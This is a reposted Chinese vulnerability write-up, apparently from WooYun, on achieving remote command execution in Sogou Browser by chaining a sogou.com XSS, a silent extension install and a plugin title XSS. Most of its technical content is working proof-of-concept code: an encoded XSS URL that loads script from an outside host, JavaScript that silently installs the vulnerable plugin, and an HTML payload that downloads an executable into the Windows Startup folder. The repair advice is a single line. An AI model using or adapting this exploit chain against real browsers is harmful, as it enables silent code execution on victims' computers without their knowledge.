记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗浏览器远程命令执行(插件安全问题+组合方式执行)

2016-01-17 13:10

搜狗浏览器最新版:

1.png



搜狗浏览器在之前的断断续续的修补中,基本没有将问题的根源找到并处理。问题如下:

1、新版本依旧没有限制sogou.com域下向se-extension域进行跳转。

2、没有解决侧边栏的静默安装问题,使用

window.open("se://sidebarextmanager/index.html").external.extension("installExtFromSidebarBox", ..........)依旧可以静默安装插件。

这就导致了只需要去找一个好利用的插件的XSS就能调用sogouExplorer对象,这个对象在插件域中,有这个API(此处请教的random_大牛):

2.png



这个API是用来进行浏览器下载的,任意插件都可以调用,显然是权限过大了,经过测试可以下载到启动目录,win7关闭UAC。

所以,我们只需要找一个好利用的插件XSS,配合静默安装,并在插件XSS中调用这个API,就能达到远程命令执行的效果。

攻击的路径如下:

3.png



根据这个思路,一步一步进行组合实现。

------------------------------

0x00

------------------------------

首先找个sogou.com下的XSS,为啥一定要找呢?因为只有在sogou.com下使用window.open函数进行新窗口打开才不会被拦截,才能使得静默安装成功。

神器扫一个XSS,没啥可说的:

code 区域
http://fuwu.wap.sogou.com/f/dianhua?fr=detail&fr1=detail_006#page=indexPage&searchKey=%22%2f%3E%3Cimg%20src%3Dx%20onerror%3D%27alert%28%2fxss%2f%29%27%3E&t=1444809286673



4.png



----------------------------

0x01

----------------------------

下面就是找个问题插件,这里有个野生的插件——“搜狗浏览器上网助手”,有浏览页面记录、最常访问网址等野生功能,但是没有对title进行很好的过滤:

5.png



通过插件的URL打开即可触发,所以是个“好利用”的插件XSS,因为可以很方便的触发,不需要用户参与。

在se-extension域下,我们就可以使用sogouExplore对象进行静默下载的操作了。



-------------------------

0x02

-------------------------

有了上面的两个XSS,就不难写出POC。

首先是sogou.com域下的XSS调用外部js:

code 区域
http://fuwu.wap.sogou.com/f/dianhua?fr=detail&fr1=detail_006#page=indexPage&searchKey=%22%2f%3E%3Cimg%20src%3Dx%20onerror%3D%27var%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%22http%3A%2f%2f1.exploitcat.sinaapp.com%2fsogou%2ftest.js%3F%22%2bMath.random%28%29%3Bdocument.body.appendChild%28s%29%3B%27%3E&t=1444809286673



外部js:

code 区域
//安装问题插件

window.open("se://sidebarextmanager/index.html").external.extension("installExtFromSidebarBox", "com.bravehearts.zhushou", "0.0.0.7", "test", '-1', 'undefined', 'undefined', function(){

console.log(arguments);}

);



//构造上网记录

function trigger(){

var url = 'http://1.exploitcat.sinaapp.com/sogou/1.html?' + new Date();

var w = window.open(url) ;

}



//跳转至恶意插件域

function go(){

var w = window.open('se-extension://ext1020332890/v.html?' + new Date()) ;

}



trigger();

setTimeout(go, 3000) ;



代码可以看到,外部js主要进行:

1、问题插件静默安装

2、创造一个恶意的浏览页面,这个页面的title包含我们的执行代码,页面代码如下:

code 区域
<!DOCTYPE html>

<html>

<head>

<title>

<img src=x onerror=sogouExplorer.downloads.downloadSilently({url:"http://127.0.0.1/calc.exe",filename:"calc.exe",path:"C:/Users/exploitcat/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/",method:"GET"})>

</title>

</head>

<body>

xss test

</body>

</html>



3、跳转至se-extension域进行触发。

6.png



撸个gif看看效果:

http://7xjb22.com1.z0.glb.clouddn.com/sogource.gif

漏洞证明:

撸个gif看看效果:

http://7xjb22.com1.z0.glb.clouddn.com/sogource.gif

修复方案:

看看上述过程,重点是静默安装和跳转限制上做修复。

知识来源: www.wooyun.org/bugs/wooyun-2016-0146761

阅读:78727 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗浏览器远程命令执行(插件安全问题+组合方式执行)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云